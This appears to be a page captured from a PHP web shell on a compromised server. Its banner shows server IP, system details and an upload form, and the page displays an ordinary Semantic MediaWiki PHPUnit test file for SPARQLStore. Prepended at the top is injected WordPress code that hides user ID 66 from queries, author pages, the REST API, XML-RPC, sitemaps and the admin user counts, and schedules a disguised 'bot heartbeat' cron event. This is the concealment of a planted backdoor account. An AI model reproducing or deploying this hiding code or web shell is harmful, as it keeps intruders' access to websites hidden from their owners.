add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/SemanticMediaWiki/tests/phpunit/SPARQLStore/ |
Upload File : |
<?php
namespace SMW\Tests\SPARQLStore;
use MediaWiki\MediaWikiServices;
use SMW\DIProperty;
use SMW\DIWikiPage;
use SMW\Exporter\Serializer\TurtleSerializer;
use SMW\SemanticData;
use SMW\SPARQLStore\SPARQLStore;
use SMW\Subobject;
use SMW\Tests\TestEnvironment;
use SMWExporter as Exporter;
/**
* @covers \SMW\SPARQLStore\SPARQLStore
* @group semantic-mediawiki
*
* @license GPL-2.0-or-later
* @since 1.9.2
*
* @author mwjames
*/
class SPARQLStoreTest extends \PHPUnit\Framework\TestCase {
private $semanticDataFactory;
protected function setUp(): void {
parent::setup();
$testEnvironment = new TestEnvironment();
$this->semanticDataFactory = $testEnvironment->getUtilityFactory()->newSemanticDataFactory();
}
public function testCanConstruct() {
$this->assertInstanceOf(
'\SMW\SPARQLStore\SPARQLStore',
new SPARQLStore()
);
}
public function testGetSemanticDataOnMockBaseStore() {
$subject = DIWikiPage::newFromTitle( MediaWikiServices::getInstance()->getTitleFactory()->newFromText( __METHOD__ ) );
$semanticData = $this->getMockBuilder( '\SMW\SemanticData' )
->disableOriginalConstructor()
->getMock();
$baseStore = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$baseStore->expects( $this->once() )
->method( 'getSemanticData' )
->with( $subject )
->willReturn( $semanticData );
$instance = new SPARQLStore( $baseStore );
$this->assertInstanceOf(
'\SMW\SemanticData',
$instance->getSemanticData( $subject )
);
}
public function testDeleteSubjectOnMockBaseStore() {
$title = MediaWikiServices::getInstance()->getTitleFactory()->newFromText( 'DeleteSubjectOnMockBaseStore' );
$expResource = Exporter::getInstance()->newExpElement( DIWikiPage::newFromTitle( $title ) );
$resourceUri = TurtleSerializer::getTurtleNameForExpElement( $expResource );
$extraNamespaces = [
$expResource->getNamespaceId() => $expResource->getNamespace()
];
$baseStore = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$baseStore->expects( $this->once() )
->method( 'deleteSubject' )
->with( $title )
->willReturn( true );
$sparqlDatabase = $this->getMockBuilder( '\SMW\SPARQLStore\RepositoryConnectors\GenericRepositoryConnector' )
->disableOriginalConstructor()
->getMock();
$sparqlDatabase->expects( $this->once() )
->method( 'deleteContentByValue' )
->willReturn( true );
$sparqlDatabase->expects( $this->once() )
->method( 'delete' )
->with(
"{$resourceUri} ?p ?o",
"{$resourceUri} ?p ?o",
$extraNamespaces )
->willReturn( true );
$connectionManager = $this->getMockBuilder( '\SMW\Connection\ConnectionManager' )
->disableOriginalConstructor()
->getMock();
$connectionManager->expects( $this->any() )
->method( 'getConnection' )
->willReturn( $sparqlDatabase );
$instance = new SPARQLStore( $baseStore );
$instance->setConnectionManager( $connectionManager );
$instance->deleteSubject( $title );
}
public function testDoSparqlDataUpdateOnMockBaseStore() {
$semanticData = new SemanticData( new DIWikiPage( __METHOD__, NS_MAIN ) );
$semanticData->addPropertyObjectValue(
new DIProperty( 'Foo' ),
$semanticData->getSubject()
);
$repositoryResult = $this->getMockBuilder( '\SMW\SPARQLStore\QueryEngine\RepositoryResult' )
->disableOriginalConstructor()
->getMock();
$baseStore = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$sparqlDatabase = $this->getMockBuilder( '\SMW\SPARQLStore\RepositoryConnectors\GenericRepositoryConnector' )
->disableOriginalConstructor()
->getMock();
$sparqlDatabase->expects( $this->atLeastOnce() )
->method( 'select' )
->willReturn( $repositoryResult );
$sparqlDatabase->expects( $this->once() )
->method( 'insertData' );
$connectionManager = $this->getMockBuilder( '\SMW\Connection\ConnectionManager' )
->disableOriginalConstructor()
->getMock();
$connectionManager->expects( $this->any() )
->method( 'getConnection' )
->willReturn( $sparqlDatabase );
$instance = new SPARQLStore( $baseStore );
$instance->setConnectionManager( $connectionManager );
$instance->doSparqlDataUpdate( $semanticData );
}
public function testCallToChangeTitleForCompletePageMove() {
$titleFactory = MediaWikiServices::getInstance()->getTitleFactory();
$oldTitle = $titleFactory->newFromText( __METHOD__ . '-old' );
$newTitle = $titleFactory->newFromText( __METHOD__ . '-new' );
$respositoryConnection = $this->getMockBuilder( '\SMW\SPARQLStore\RespositoryConnection' )
->disableOriginalConstructor()
->setMethods( [ 'insertDelete' ] )
->getMock();
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$store->expects( $this->once() )
->method( 'changeTitle' );
$instance = $this->getMockBuilder( '\SMW\SPARQLStore\SPARQLStore' )
->setConstructorArgs( [ $store ] )
->setMethods( [ 'doSparqlDataDelete', 'getConnection' ] )
->getMock();
$instance->expects( $this->once() )
->method( 'getConnection' )
->willReturn( $respositoryConnection );
$instance->expects( $this->once() )
->method( 'doSparqlDataDelete' )
->with( DIWikiPage::newFromTitle( $oldTitle ) );
$instance->changeTitle( $oldTitle, $newTitle, 42, 0 );
}
public function testNoDeleteTaskForSubobjectsDuringUpdate() {
$expectedSubjectForDeleteTask = DIWikiPage::newFromTitle( MediaWikiServices::getInstance()->getTitleFactory()->newFromText( __METHOD__ ) );
$subobject = new Subobject( $expectedSubjectForDeleteTask->getTitle() );
$subobject->setEmptyContainerForId( 'Foo' );
$semanticData = $this->semanticDataFactory
->setSubject( $expectedSubjectForDeleteTask )
->newEmptySemanticData();
$semanticData->addPropertyObjectValue(
$subobject->getProperty(),
$subobject->getContainer()
);
$repositoryResult = $this->getMockBuilder( '\SMW\SPARQLStore\QueryEngine\RepositoryResult' )
->disableOriginalConstructor()
->getMock();
$connection = $this->getMockBuilder( '\SMW\SPARQLStore\RepositoryConnectors\GenericRepositoryConnector' )
->disableOriginalConstructor()
->getMock();
$connection->expects( $this->atLeastOnce() )
->method( 'select' )
->willReturn( $repositoryResult );
$connection->expects( $this->atLeastOnce() )
->method( 'insertData' );
$instance = $this->getMockBuilder( '\SMW\SPARQLStore\SPARQLStore' )
->setMethods( [ 'doSparqlDataDelete', 'getConnection' ] )
->getMock();
$instance->expects( $this->once() )
->method( 'doSparqlDataDelete' )
->with( $expectedSubjectForDeleteTask );
$instance->expects( $this->atLeastOnce() )
->method( 'getConnection' )
->willReturn( $connection );
$instance->doSparqlDataUpdate( $semanticData );
}
public function testDoSparqlDataUpdate_FailedPingThrowsException() {
$semanticData = $this->getMockBuilder( '\SMW\SemanticData' )
->disableOriginalConstructor()
->getMock();
$repositoryResult = $this->getMockBuilder( '\SMW\SPARQLStore\QueryEngine\RepositoryResult' )
->disableOriginalConstructor()
->getMock();
$connection = $this->getMockBuilder( '\SMW\SPARQLStore\RepositoryConnectors\GenericRepositoryConnector' )
->disableOriginalConstructor()
->getMock();
$connection->expects( $this->once() )
->method( 'shouldPing' )
->willReturn( true );
$connection->expects( $this->once() )
->method( 'ping' )
->willReturn( false );
$connection->expects( $this->never() )
->method( 'insertData' );
$instance = $this->getMockBuilder( '\SMW\SPARQLStore\SPARQLStore' )
->setMethods( [ 'getConnection' ] )
->getMock();
$instance->expects( $this->atLeastOnce() )
->method( 'getConnection' )
->willReturn( $connection );
$this->expectException( '\SMW\SPARQLStore\Exception\HttpEndpointConnectionException' );
$instance->doSparqlDataUpdate( $semanticData );
}
public function testGetQueryResult() {
$description = $this->getMockBuilder( '\SMW\Query\Language\Description' )
->disableOriginalConstructor()
->getMock();
$description->expects( $this->atLeastOnce() )
->method( 'getPrintrequests' )
->willReturn( [] );
$query = $this->getMockBuilder( '\SMWQuery' )
->disableOriginalConstructor()
->getMock();
$query->expects( $this->atLeastOnce() )
->method( 'getDescription' )
->willReturn( $description );
$idLookup = $this->getMockBuilder( '\stdClass' )
->disableOriginalConstructor()
->setMethods( [ 'warmUpCache' ] )
->getMock();
$store = $this->getMockBuilder( '\SMW\SQLStore\SQLStore' )
->setMethods( [ 'getObjectIds' ] )
->getMock();
$store->expects( $this->any() )
->method( 'getObjectIds' )
->willReturn( $idLookup );
$repositoryClient = $this->getMockBuilder( '\SMW\SPARQLStore\RepositoryClient' )
->disableOriginalConstructor()
->getMock();
$connection = $this->getMockBuilder( '\SMW\SPARQLStore\RepositoryConnection' )
->disableOriginalConstructor()
->getMock();
$connection->expects( $this->atLeastOnce() )
->method( 'getRepositoryClient' )
->willReturn( $repositoryClient );
$connectionManager = $this->getMockBuilder( '\SMW\Connection\ConnectionManager' )
->disableOriginalConstructor()
->getMock();
$connectionManager->expects( $this->any() )
->method( 'getConnection' )
->willReturn( $connection );
$instance = new SPARQLStore( $store );
$instance->setConnectionManager( $connectionManager );
$instance->getQueryResult( $query );
}
public function testGetQueryResultOnDisabledQueryEndpoint() {
$query = $this->getMockBuilder( '\SMWQuery' )
->disableOriginalConstructor()
->getMock();
$store = $this->getMockBuilder( '\SMW\Store' )
->disableOriginalConstructor()
->getMockForAbstractClass();
$store->expects( $this->once() )
->method( 'getQueryResult' );
$repositoryClient = $this->getMockBuilder( '\SMW\SPARQLStore\RepositoryClient' )
->disableOriginalConstructor()
->getMock();
$repositoryClient->expects( $this->atLeastOnce() )
->method( 'getQueryEndpoint' )
->willReturn( false );
$connection = $this->getMockBuilder( '\SMW\SPARQLStore\RepositoryConnection' )
->disableOriginalConstructor()
->getMock();
$connection->expects( $this->atLeastOnce() )
->method( 'getRepositoryClient' )
->willReturn( $repositoryClient );
$connectionManager = $this->getMockBuilder( '\SMW\Connection\ConnectionManager' )
->disableOriginalConstructor()
->getMock();
$connectionManager->expects( $this->any() )
->method( 'getConnection' )
->willReturn( $connection );
$instance = new SPARQLStore( $store );
$instance->setConnectionManager( $connectionManager );
$instance->getQueryResult( $query );
}
public function testGetPropertyTableIdReferenceFinder() {
$store = $this->getMockBuilder( '\SMW\SQLStore\SQLStore' )
->disableOriginalConstructor()
->getMock();
$store->expects( $this->once() )
->method( 'getPropertyTableIdReferenceFinder' );
$instance = new SPARQLStore( $store );
$instance->getPropertyTableIdReferenceFinder();
}
}